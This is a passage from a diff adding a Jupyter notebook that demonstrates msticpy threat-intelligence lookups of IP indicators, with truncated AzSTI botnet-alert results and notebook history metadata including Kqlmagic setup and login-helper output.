'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n32  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n33  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n34  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n35  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n36  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n37  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n38  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n39  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n40  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n41  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n42  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n43  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n44  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n45  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n46  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n47  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n48  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n49  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n50  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n51  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n52  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n53  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n54  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n55  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n56  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n57  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n58  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n59  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n60  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n\n                                                                                              RawResult  \\\n0                                                                                                   NaN   \n1                                                                                                   NaN   \n2                                                                                                   NaN   \n3   {'IndicatorId': '2E9C9B5884CE9D1AAECA21C5EB772C30C3C84093C452AA038868AD4EEF50E83E', 'TimeGenerat...   \n4   {'IndicatorId': 'AA38B8D61F8587B779AABF6C4F2DBD226C7704600A5CBBB7779A7D0E7AFA05C4', 'TimeGenerat...   \n5   {'IndicatorId': 'E9DD356FF6855D16952067E4A35F0AAA1A8FF4E955E20B249131BD0EF7115A1E', 'TimeGenerat...   \n6   {'IndicatorId': '0612D0A787F9B2EA5FC1206C3727B3ADAD45D8AEDE2D90ADEC1C3B1590A609E0', 'TimeGenerat...   \n7   {'IndicatorId': '4DDD4BC9AD3844756B4DF7FAB23E9E9B917124D0A257BB405EF5715DEAA3D61B', 'TimeGenerat...   \n8   {'IndicatorId': 'CAFF80F6C8FD64CDA73AE68E382C6A7B6C94CA257C897324E6DB78D8C2106588', 'TimeGenerat...   \n9   {'IndicatorId': 'C72FAFC4A20054F73B343418F5EBE887610D257FFD51439392CC0376AB3B7173', 'TimeGenerat...   \n10  {'IndicatorId': '6E2A2B758395B8894E3B0D189870E155E0894D3801B951AE438D5C4A808F48E4', 'TimeGenerat...   \n11  {'IndicatorId': '30196A288FA811E8ACCCC84C434E3AD15F175B17BE2D4458DD3BC660073C1365', 'TimeGenerat...   \n12  {'IndicatorId': 'E75DD2AC6D75085D6CC7F441B2AFB121D77422CA708C04923CEB74C0A6245DBA', 'TimeGenerat...   \n13  {'IndicatorId': '12F46CB0B858952D8E9ABC29803373104673E7AD463AFA24C603B03CD8C14953', 'TimeGenerat...   \n14  {'IndicatorId': '017D81A341E38E8355DA9EB6AAEE8AADC411ECE067DA84B586F59AC8EB3EDFAE', 'TimeGenerat...   \n15  {'IndicatorId': 'A973BDB744EF6FC429B19E346C2A8B5EB42DBC292EB37C0BBE4F2CCED98F5F9E', 'TimeGenerat...   \n16  {'IndicatorId': '9570FF685A0289C703861F52B094C25A8D774570433A6562C85229A48DC826D3', 'TimeGenerat...   \n17  {'IndicatorId': 'D46F322358CB5FE7009A492564DD60C67E529A8439EA2B5F355385B9724F991C', 'TimeGenerat...   \n18  {'IndicatorId': '874BD11D0EBF97F31A3ACC1E5A28B3DF637D4817BFBAAC59C25350DEC7C78185', 'TimeGenerat...   \n19  {'IndicatorId': '7D0F24BEFB1FDFCE86BBE54EB05BAF62FAB93E5C0175E86EB6C5BF3F7E19AD23', 'TimeGenerat...   \n20  {'IndicatorId': '0D2CC834B27D0EB8A4485B6B21295606F38B8DF06C0B2858D511157EE86AF219', 'TimeGenerat...   \n21  {'IndicatorId': '7A9D9126C9B0F56B76B874E5C36ED807320A91E5A566E717F30C6022E8B77644', 'TimeGenerat...   \n22  {'IndicatorId': 'DDA218AD2568287384B6DD205ECA680D9CAFD5AE6B65B6821552AE11E12189D9', 'TimeGenerat...   \n23  {'IndicatorId': '8A5D40A2674F98084398B2BFD97E33B39665F9B5FE98A485C1C149F363442679', 'TimeGenerat...   \n24  {'IndicatorId': '4C007C39F6FEA5B88E1C456CB46929EAD4283B475689957EFF01C01395CE56A0', 'TimeGenerat...   \n25  {'IndicatorId': 'EA6FB2555F18DF5705C116F2BFFFF6F0AC23FE79CC1F70690CE696B15758F961', 'TimeGenerat...   \n26  {'IndicatorId': '1238F3DBC455768842E6EB9D6601C4C98FDE6A390BBC97B78BE7240F33D5F2D9', 'TimeGenerat...   \n27  {'IndicatorId': 'AF4653DB24E9C45A116A6CD2B25D103D55A76457CEE9597205A3B3F4438F4CA1', 'TimeGenerat...   \n28  {'IndicatorId': 'C8133547D243769B2C38D4C2D03E90A14A340C7538BDAA21FE95BB2C906F350A', 'TimeGenerat...   \n29  {'IndicatorId': '22E5A059B774EA99993C1C66A83F4001F8A238EF805D992782F6E84A4EA07066', 'TimeGenerat...   \n30  {'IndicatorId': 'C1D879AB9AF519E159684A8F592D5F8A035E7333A78BD612204ED0F1E1AE9DF4', 'TimeGenerat...   \n31  {'IndicatorId': '57DA6DAC917CF91DCF7ADEFFBC8AE94EE839C09FFD4103742D54E05A4E608FFB', 'TimeGenerat...   \n32  {'IndicatorId': '9C3E69D4268C0BF3A77C166C0F05BFF8D09B007B75D01517C7A76EBD1334F22A', 'TimeGenerat...   \n33  {'IndicatorId': 'E91D764D861739FAEF7B106ED830D247262CDA4F2A8B312F1172E74D10CFD995', 'TimeGenerat...   \n34  {'IndicatorId': '066D608C45B2A7CD63AD0F3286B56917E410546F6DF9A1E3A7018DCE33F29F66', 'TimeGenerat...   \n35  {'IndicatorId': '72AD9E8122E8CAA56BF8EB0642DAAE3DFCF8C869868623EBD7B9BA43E630062A', 'TimeGenerat...   \n36  {'IndicatorId': '2E36BE6DCEACAF7491EC274718845AA84A8AE2EAE025F16DFC87B0D2DEA040DD', 'TimeGenerat...   \n37  {'IndicatorId': '87B84EEB12E45B0AC046178C4DF3BE304534E4404891AB3B670AB337CBDC6026', 'TimeGenerat...   \n38  {'IndicatorId': '2B3D1B719533D10EF42E0BA1948BDE099A83C38BAF53E8369CB9651A890A0CD2', 'TimeGenerat...   \n39  {'IndicatorId': 'F3DB1ED9EF6CC0C468A309198BA2526152F52D87DB4D56FA56AB43B615149186', 'TimeGenerat...   \n40  {'IndicatorId': '3DE92C875100CC6465533A6767AEB58A202D7C347792D72F9D3B62BA93B17BD2', 'TimeGenerat...   \n41  {'IndicatorId': '33C315E5D5D7C9466CB1F69146AD433928FF973890E2D3BDAF24C4A35A28F8AE', 'TimeGenerat...   \n42  {'IndicatorId': 'C735591AC4BB071A7FF91C7B6DFB716CB443F323B199C1E2D98E572D1E405665', 'TimeGenerat...   \n43  {'IndicatorId': '7013C9E4A99F8869AF650FC36ACE5380C9037C3599C001B8906120A54CB6A6D2', 'TimeGenerat...   \n44  {'IndicatorId': '681C2296F85244215361CCFB1F0863DA7BF92C42BD091E29B4BFAFFD8BE46B12', 'TimeGenerat...   \n45  {'IndicatorId': '7C5DAF47611B1F133E76B16145E46F30F269348A9C34C51AA7FFDC5FA8A7D231', 'TimeGenerat...   \n46  {'IndicatorId': '50CBE99DC38594E814D47C2FC3E065E434297F92927C5642706DDEDEF9100A12', 'TimeGenerat...   \n47  {'IndicatorId': 'AE3584C5872970B9B16536D5F4A39B247D52F183A34B8D0D3A501FDE1D604057', 'TimeGenerat...   \n48  {'IndicatorId': 'AF0236BB54DB7C849FEF2D6A6E63143481214566E7666B1FF8D68B099C88DB37', 'TimeGenerat...   \n49  {'IndicatorId': 'D4EEBDC99B631C24A1445A428EB0CA4AC70809C2382521B12270237862FDFAC6', 'TimeGenerat...   \n50  {'IndicatorId': '6A131B8B9E162BB546FBC24F0563A66A0DE69105B6614E881927BB537817345B', 'TimeGenerat...   \n51  {'IndicatorId': 'C771855E8F619F1852441349C314334193E7F45A8B4A9E5A20B0FAB9DD4DF783', 'TimeGenerat...   \n52  {'IndicatorId': 'FE9F08ED47A7E93E33C91A86D9B835E6A87DDE85660E19FCE35C254DDE95C641', 'TimeGenerat...   \n53  {'IndicatorId': '77C853D9EB8905812EEE44FCF5A7769F5E1F1CAC4CAE769FE7A33EBE5CC6EFB4', 'TimeGenerat...   \n54  {'IndicatorId': '334D78E4F5D02FD26CF6B0A0BCFEC0272006B94BDB2622F65DCD724787CBBDC7', 'TimeGenerat...   \n55  {'IndicatorId': 'AA67F6A7A899FAF845E959052C30C712DC96089309CF3F41CE24368E1B4E9F3D', 'TimeGenerat...   \n56  {'IndicatorId': '3DFA877928D3B3E4D43696BF27ACA7098523C7429E43FD439368A4535FEB1E8E', 'TimeGenerat...   \n57  {'IndicatorId': '999F73C902C15F983A702972C30F23D1AD7DEE102BC82C4259AEAF4BB2FDA42A', 'TimeGenerat...   \n58  {'IndicatorId': '385F55DABB06B0B7C850AB889E516E2442A1ABF7268C6408B3F136F9DF402010', 'TimeGenerat...   \n59  {'IndicatorId': '70DD90016151A370513F852A93B5FCE681D9E01C200860BA6F12A50FABC5A702', 'TimeGenerat...   \n60  {'IndicatorId': '6422C91AB690A6BDF52A937BF1E03A4F802546D5D5EACA011157A98DB20F590C', 'TimeGenerat...   \n\n   Provider  \n0     AzSTI  \n1     AzSTI  \n2     AzSTI  \n3     AzSTI  \n4     AzSTI  \n5     AzSTI  \n6     AzSTI  \n7     AzSTI  \n8     AzSTI  \n9     AzSTI  \n10    AzSTI  \n11    AzSTI  \n12    AzSTI  \n13    AzSTI  \n14    AzSTI  \n15    AzSTI  \n16    AzSTI  \n17    AzSTI  \n18    AzSTI  \n19    AzSTI  \n20    AzSTI  \n21    AzSTI  \n22    AzSTI  \n23    AzSTI  \n24    AzSTI  \n25    AzSTI  \n26    AzSTI  \n27    AzSTI  \n28    AzSTI  \n29    AzSTI  \n30    AzSTI  \n31    AzSTI  \n32    AzSTI  \n33    AzSTI  \n34    AzSTI  \n35    AzSTI  \n36    AzSTI  \n37    AzSTI  \n38    AzSTI  \n39    AzSTI  \n40    AzSTI  \n41    AzSTI  \n42    AzSTI  \n43    AzSTI  \n44    AzSTI  \n45    AzSTI  \n46    AzSTI  \n47    AzSTI  \n48    AzSTI  \n49    AzSTI  \n50    AzSTI  \n51    AzSTI  \n52    AzSTI  \n53    AzSTI  \n54    AzSTI  \n55    AzSTI  \n56    AzSTI  \n57    AzSTI  \n58    AzSTI  \n59    AzSTI  \n60    AzSTI  "
+     },
+     "execution_count": 36,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Using a wider ranges produces results\n",
+    "ti_lookup.lookup_iocs(data=ioc_ips, providers=\"AzSTI\", start=q_times.start, end=q_times.end)"
+   ]
+  }
+ ],
+ "metadata": {
+  "celltoolbar": "Tags",
+  "hide_input": false,
+  "history": [
+   {
+    "cell": {
+     "executionCount": 1,
+     "executionEventId": "70a7d32e-f312-4f33-b41c-566918af9ea8",
+     "hasError": false,
+     "id": "9dd0697a-24e3-4283-b634-83da0179b04b",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "\nThis product includes GeoLite2 data created by MaxMind, available from\n<a href=\"https://www.maxmind.com\">https://www.maxmind.com</a>.\n",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "text/html": "\nThis library uses services provided by ipstack.\n<a href=\"https://ipstack.com\">https://ipstack.com</a>",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      }
+     ],
+     "persistentId": "249a5400-e20e-452e-8d0d-2c65a8856bdf",
+     "text": "# Imports\nimport sys\nimport warnings\n\nfrom msticpy.common.utility import check_py_version\nMIN_REQ_PYTHON = (3,6)\ncheck_py_version(MIN_REQ_PYTHON)\n\nfrom IPython import get_ipython\nfrom IPython.display import display, HTML, Markdown\nimport ipywidgets as widgets\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set()\nimport networkx as nx\n\nimport pandas as pd\npd.set_option('display.max_rows', 100)\npd.set_option('display.max_columns', 50)\npd.set_option('display.max_colwidth', 100)\n\nfrom msticpy.data import QueryProvider\nfrom msticpy.nbtools import *\nfrom msticpy.sectools import *\nfrom msticpy.nbtools.foliummap import FoliumMap\n\nWIDGET_DEFAULTS = {'layout': widgets.Layout(width='95%'),\n                   'style': {'description_width': 'initial'}}\n\n# Some of our dependencies (networkx) still use deprecated Matplotlib\n# APIs - we can't do anything about it so suppress them from view\nfrom matplotlib import MatplotlibDeprecationWarning\nwarnings.simplefilter(\"ignore\", category=MatplotlibDeprecationWarning)\n\n"
+    },
+    "executionTime": "2019-08-15T21:01:17.410Z"
+   },
+   {
+    "cell": {
+     "executionCount": 2,
+     "executionEventId": "51099a77-e76d-4cf3-b9d8-c2111dda63c5",
+     "hasError": false,
+     "id": "5a08a12b-9087-455e-a574-f6a99beb9e6e",
+     "outputs": [
+      {
+       "name": "stdout",
+       "output_type": "stream",
+       "text": "Please wait. Loading Kqlmagic extension...\n"
+      },
+      {
+       "data": {
+        "text/html": "<html>\n            <head>\n            <style>\n            .kql-magic-banner {\n                display: flex; \n                background-color: #d9edf7;\n            }\n            .kql-magic-banner > div {\n                margin: 10px; \n                padding: 20px; \n                color: #3a87ad; \n                font-size: 13px;\n            }\n            </style>\n            </head>\n            <body>\n                <div class='kql-magic-banner'>\n                    <div><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAALsAAACcCAYAAAAnOdrkAAAQeklEQVR42u2di5MVxRXGe5cFFhEQQcGVx4KgLg8XLFCDCigqkvgCSVQqIgRNTP6R/AcmMRpjaWLQEEWRCGrEIKXIGxUMIvJUkKcisryWfB9zVm8w1Hbfnefe76vq6ru70zO9c3/Tc6bnnNM14347z0lSJahGp0AS7JIk2CVJsEuSYJckwS5Jgl2SBLskCXZJEuySJNglwS5Jgl2SBLskVQbsp0+fvgRVT8/Nv66qqtqp0y6Bm1pUdSi1HpsfR9kDdg5nBjs63A/Vb1DGeDZZjzZPotMb9XVXNOhVqKag3G3At6Z9KK+h3fNgpymrkf0ilInowI88/0luvwhFsFe2uqIMR7kD7PTy4OYIqt0EHiUz2Dt43oZaxG2r9V1XvDiyd0Tp7Ll9F5RO1k4PqJIk2CVJsEuCXZIEuyQJdkkS7JIk2CVJsEuSYJckwS5Jgl2SBLsk2CVJsEuSYJckwS5Jgl2SBLskCXZJEuySJNjbiSyJUA8XpZ1gFP7ZkfUnUI66KPHU1zpjFQ47gGG6htoymjYBoBMZwF1npT/KAKsvRunmorQl323uovwpe1E+R9ttqDehbEfZhb6fDDxuR49NT2G/3wr2fILeiOp6g8U33wgh4ii5Bu2XhkDThn72cVHCIGZVG41ymfWZo3oP9KGqlfZMIHSQ0Lso+dT7+N37/IymR1ppy2MywVVvj65+he1XYJ9LBXu+QCfkc1AmoVwY0JS5BJcZKCcT7iNzZI5FmYgyDmUojnlh6H7QpquZOkxFeA32exvqdShv4fObvHCxTfM5RnSC/gjKII9DMSPX+Wj3IfZ3ULDnA/RrUf0SZTq+lPMC225B9TZHxwT7180gu91AH45+dopr/9gXL6JLcJyrUV+H8jI+L8bvPz9r0442og/C38736Pdgu+N0KiobNe0MdJoBD6NMKwP09aj+iPIc2u5PqH8NqO60MhbH6ZzUucC+CeZUHPNK1JejnovfrdMDavsAfZTdkqf7jFRpgm5ZazmKz0D5iY2+qQjHasDxCX5f1E8V2eYW7P8L+v34Mi/IGegcvX+MMhtlcpwmSwDwvdCPGWZzV+Pnt10bk4QK9mxBfwBfYs/AtqtQ/QllbkKg05S6h6YV9n9TlueJJhP6w3zoTTaD87lgLxbojW0AfTmqP6C8iLaHEjJdOKI/iv3fGNM+Obd+quUBM/Quwe0NeF7Yi51/ymjBnjHofNibY6ZLKOjvGujz0PabhLo4AeWhtoCOfrJvfGH0mY3EnPI7ZibIefh7X/f9y6dLcayOHsB3R7tpbI/S3VXQW/SagoI+FNUslPtC56bTAN36dz/KrWW2/xLVGpT3UFaibDHQObKfdN8n8+eDOB8+ebwxaMepxsbWZqLw9wE2wh/B51rBnm/QOaI/aNNreQOdo+VdNGHKmVq0Ps5H+RfKx60smrXfRv4VaPcGQecFhs+c8RnWCvB9ZLMXA/SZodN3KZku1ESUe3GM/oH9I9QLOStE0ENXhsP2vBu8zjecqD9C/QDqSfi9nP2KBnsRQMdxhtjsy3VlmC0voDyN/q1o46zLF9jfX8zGP0BzJfQFm2DPFnS+qp6d8xGdok/O+Nact87q3yEbzR9Hsw1xdML8ejjK00uxGfX0JN/WCvb4QKc58HOWPIOOY9Fb8WYc57LAplzu8Nm4QD8L+mV8iYSPnGO/N+QiFOzpg05PvpkumsLrn1fQTfTLGRvYR3pY/hX9W5lUp+gegONw1oazVjcL9vyC/iDNF3xhg/MMuvmk04QZEtBmB6q/26xL0uIxON04sIw7j2BPCfQ5oV9OBiM6Rc/Ca3xe6lgfGSTCqcKFrQVYxDS6H8MhX8fHRtSPVOoMTY1Ab3N/+cqevuOXBzTj9OCr6OOmtM4rjrUFfV3kIl/6UYI9e9BpDtA77xdlgE5PPnovzk9xRKf4LEHf9N4BbeiXszKDU8xpzXdwrkZU4uhekyPQe6H6GcosfBFDAtsy/Oz3KAvQtinlrvN5oiGgr5z/Xo5+bkv7HDNaCcd/Cx/pgTlcsGcHOt/40RW2oQzQH0N5JYOMANVmvtQFNNuKsiHD081opdWCPVvQ+eB0VVFAN12EcoXzi85v0acouzI85Uy3sRrnjr47vQS7QPcV564H4/jVnn2mv8snLnLgykQ8V+gH7yw7UQR7SqDTB/2+AoNOXRxowhDyzSk/QJ9rdKc51SjYk1VHCwC+02z0UNDXuiiULmvQKQZPhASOfGmgZS1mEtuMc3k8i5jYSoGdxxvoouk6ugCMLmMfvP1uzBp0S61HX52QTAZ7sjRhSsRAEEY/HbK7k2BP6LZ/B0dEwFruiw1OS47kCI99nM7w3HUxmzfEfXYfStYmDO12ekJ+4aIMaII9oZPMKJ7b27iPK/FF0Wf8Y5dg5i5P2Hta7XMnOI7qgIsy7+ZBe/Nw4VXEA2obxZciG5i9FvDvyagP9A/vHuA2e8zMhqacnMPDVgR7nsVESACdD7j0MflbRt3oGGjCEPavrM6DmgR7cYC/iikhUBiUvLYAsNOM+SaNNNgBsH8l2ItlznwA4LcDogMpH7uDC0sydDJHo/p3F59gL87o3hugM20F3wjOy2Bkry0w7MwsRj/3Zt83wII9RvF1Ok58t0DgmRxoqpkzH6U8sncKhL0pR6e75eI76Qqcc72QsANWho5xiZRRgDZ0enKSmTM7UlxMq8qFZcJtNrDyNLIfFezpg97i68J58/FcggXQevttYNu+ls6NI/uCFGEJgbeD81uoK03YT9lFKJs9JdAZG8nAi1fMI4+xmUygPyAwYSmXl7kH7TalFO5G0ENWjyPoXXL03bdcfNWCPXnI+aqf6d4YSrewxdeFadzwp5ddFFwwNWB0r0a7yS5K/bYrhUDm0AfODq68ZSqT/O675Oxu0/5g5wwAR3Ib0Rf9Hx8Xxme+xPWAQiKXsG0/Pqy6aHZmUcL/xonAkb0mZ7CfudP4ZkQQ7G0D/TGc6MXngPa0mTMjmBEscI0k5lm8G+3oN/5pgv8KZ1ZClkjkQyCXeemEfh3PyXdfMemqsxrZOeL+7lyglwDP4GCmbh6BMiVgdKe//BQzZ55gzpSE/g+O6vtxjGOeeRQJFtd74rZ5gP3MxSfYkxvVd9uo/qZnk/fNnLk8JLUGtq0vmZ1ZkiTsVvvAXuolmQeflDOObII9OdHrb6uvf4jNzvAOMNIyWYW8nr/RZme2oF3s0UFM2YF90+PyiPOIVrIH6F45mpHp5sKirAR7GWoOhGorIHnJZmduCmhXyxUozJz5c0KRTQyAoDNVP8/tmQSqR06++94a2fMpprV7kWmhuR5QAPBDSmZnliXQL8aUhjignVl8F2V9Ds5pX9nsORSg/RbQvmbmzOzA1G032uzMZ3zoTcAs2xkIOy/ANxgal9X5xPFpwvTXyJ5f4D+x2RmaM+MC2nG6j3GvH6J+Jua4VY7qjNLnqnNdPbZnUqUGq/dkeDppq9eHLnsv2NPVUpSXuewM/WECgG+wuNWNLkruGdcF+DX2y30ynrOrx/bVtn5rXcawX+oCcskL9mxGd8K1wEb3BwObT7SH1W22slxc2uyihEP1ntufyY7gonVOsxLzyQ8Q7PkHnsBy7r2BvuwB7Xpa3Crn3uOMW+W0Jt2Lx/sEQWCbgdj2epQlSUyJetjrtNXpNNdPsBdDSzi644urD8mLTrdhmjNxxq0yuwH2t8JGd9/lcOjSMNplkx2MCydcV4mLiRU1u8ABM2doDvw0sPkke1iNM251nd0xfGGn3X4L+rAafdiR4qheZ///MFeBKnJ2gTVmztAzcmRAu97mSsC593/EaLdzRYtxPmmgzX+H0NEd4pkUTxuXmJlQSZ6O7QJ2E0P5RtgqcN0DgB9j5sx/4ohbtfcAXOaGSy9O9mzTYLGzDDZZnsKoztH8DrsbOsFevNF9d4ln5J2BzW+12Zm44lZpyizC/hoDpkVvQdmGNnu5wFeCoNNNYRovxEpe+Lc9LCLFh0O6EgxlHsiACyXWuFVzDOOdhi+8pnu26cZET/jIh9ynkkjlh/12N9AfCF0hXLDnb3RvtjjWlkCPrgHNOQV3d4xxq/R5WWCr0V3p2X8uxstVvI+jfg4/fxEj6PSfv9dFCycPcxWudrE8IL7InSVxq5MD2rXErW6II27VIqw4ujeGXHhmvz+Kj91Rz8XPG2MAfYCN6DPLzIMv2HOs91DmmzkzOADQ/iXmzOIYLrwd2B9neRhscldAu6Fo9yt8rEPNZd6XlXPx2SLEfNlG94hplbx8e7uF3ZYsX2TmzMOBy6dwSo6zM5/GFLdKd+I+2F9v7C/EaY3PEQ+5aLnJhTbDQxProAfkdOqiK8INLsqBPz40u5pgLxbwW0o8IycEtOtkcat82fRkW+NWzZyhSzJdFM4LWWXELtIJaDfcZmtW4jNnevi2lS7FjF9lcqNq+/74AErHLq5NdQ3K1dhHndBu57CXjKrzLdCjXwBk9SUvm5bEcOEdMXOmC+pfhy5mbG4Qt9KPxkVBIvSsZMwrM+8yrJF5aBjix+Up6TLcVyN5hcFukP3TRYEeswLnlW+w2ZlY4lbNreEFA56m1dAy9sEc8PXO36vS17ZnIAtXy6sX7MUG/mN8mS+6yAfk2hCwzopbPRlDX/ji61mOxpxiDMlhmZRsec3X7WGYd4RawV5sLTVzhp6RfQJnRVoCPZbFdPExB87T+HiQD6D4eUKGoNOP/gmUVbyLuXxlFhbsZQJ2CF/sqy5yJZgR2HyCje5b4nrJg/0wodJztL05p++iV/e9UoScD7ac3eFd5hV7wD3hKkjteWQnYOtpzligx+iAdqVxq8/GFbdKlwIXvWGlW+8nZjKNCgwgLwf0bag4O8Tnh6VMv2dB13pAbWd6yx5W60NSYPP1uqXh4HqrK2K+CNdh38xKsJojPD4zA8IVcS+tjv3ut77zDvca9r9ZszHli6nf+MbQd5aBMxypLlpl5gNdCQahvs15BEabmOqC89VclW9d3MlI2S8XBY/zYZHpAMfhM6OI+GLo0nLXOcI+aINzJP/InjlouqxNMOdlOaL5xNW+P0N/B3lsz7SJnH49niXsvB3P5cn03J5urKmPLviiV+GkPu6iIOcLAi9mjsCnE+wbB4Dt6N+/XeRiwGeMRvM/b8ntwunHH6SXtozIXCqG5tEh+z74AopBIR/QVDLTKW/mJT1E37UffcIqmXVthc+b5MRgx8EPo9PPO//8hU0JpaHz6es7FisaaiocTWPtUhxjn412y83/vM5gp1suXxr1NDub4FfZKHfYID9gF+VWXjgxZ09I6v/lm2Eu2uwTNXWKATKZ2+wGQiFWSrZb+bEC9JN+7SwMPawywDkX3rkEjmb7X5rsgizczIrddVK781TCA2rRZ5RoQh2xIgl2SRLskiTYJcEuSYJdkgS7JAl2SRLskiTYJUmwS5JglyTBLkmCXRLskiTYJUmwS5JglyTBLkmCXZIEuyQJdkkS7JIk2KUfiEmWmFZuo2cKOi5ewERMxwS7VCjZgmvMA8ncmz4pAbndeqYCF+xSEYHn+lFcA9aHg1Nxpe4W7FKW0FfE6huCXdIDqiQJdkkS7JIk2CVJsEuSYJckwS5Jgl2SBLskCXZJsEuSYJckwS5JxdB/ASH5FI/5dHZAAAAAAElFTkSuQmCC'></div>\n                    <div>\n                        <p>Kql Query Language, aka kql, is the query language for advanced analytics on Azure Monitor resources. The current supported data sources are \n                        Azure Data Explorer (Kusto), Log Analytics and Application Insights. To get more information execute '%kql --help \"kql\"'</p>\n                        <p>   &bull; kql reference: Click on 'Help' tab > and Select 'kql reference' or execute '%kql --help \"kql\"'<br>\n                          &bull; Kqlmagic configuration: execute '%config Kqlmagic'<br>\n                          &bull; Kqlmagic usage: execute '%kql --usage'<br>\n                    </div>\n                </div>\n            </body>\n            </html>",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "text/html": "<html>\n        <head>\n        \n        </head>\n        <body>\n        <div><p style='padding: 10px; color: #3a87ad; background-color: #d9edf7; border-color: #bce9f1'>Kqlmagic&nbsp;package&nbsp;is&nbsp;updated&nbsp;frequently.&nbsp;Run&nbsp;&apos;!pip&nbsp;install&nbsp;Kqlmagic&nbsp;--no-cache-dir&nbsp;--upgrade&apos;&nbsp;to&nbsp;use&nbsp;the&nbsp;latest&nbsp;version.<br>Kqlmagic&nbsp;version:&nbsp;0.1.101,&nbsp;source:&nbsp;https://github.com/Microsoft/jupyter-Kqlmagic</p></div>\n        </body>\n        </html>",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "application/javascript": "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}",
+        "text/plain": "<IPython.core.display.Javascript object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "application/javascript": "try {IPython.notebook.kernel.reconnect();} catch(err) {;}",
+        "text/plain": "<IPython.core.display.Javascript object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "application/javascript": "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}",
+        "text/plain": "<IPython.core.display.Javascript object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "text/html": "<!DOCTYPE html>\n                    <html><body>\n\n                    <!-- h1 id=\"user_code_p\"><b>F6R4GZR4C</b><br></h1-->\n\n                    <input  id=\"kql_MagicCodeAuthInput\" type=\"text\" readonly style=\"font-weight: bold; border: none;\" size = '9' value='F6R4GZR4C'>\n\n                    <button id='kql_MagicCodeAuth_button', onclick=\"this.style.visibility='hidden';kql_MagicCodeAuthFunction()\">Copy code to clipboard and authenticate</button>\n\n                    <script>\n                    var kql_MagicUserCodeAuthWindow = null\n                    function kql_MagicCodeAuthFunction() {\n                        /* Get the text field */\n                        var copyText = document.getElementById(\"kql_MagicCodeAuthInput\");\n\n                        /* Select the text field */\n                        copyText.select();\n\n                        /* Copy the text inside the text field */\n                        document.execCommand(\"copy\");\n\n                        /* Alert the copied text */\n                        // alert(\"Copied the text: \" + copyText.value);\n\n                        var w = screen.width / 2;\n                        var h = screen.height / 2;\n                        params = 'width='+w+',height='+h\n                        kql_MagicUserCodeAuthWindow = window.open('https://microsoft.com/devicelogin', 'kql_MagicUserCodeAuthWindow', params);\n\n                        // 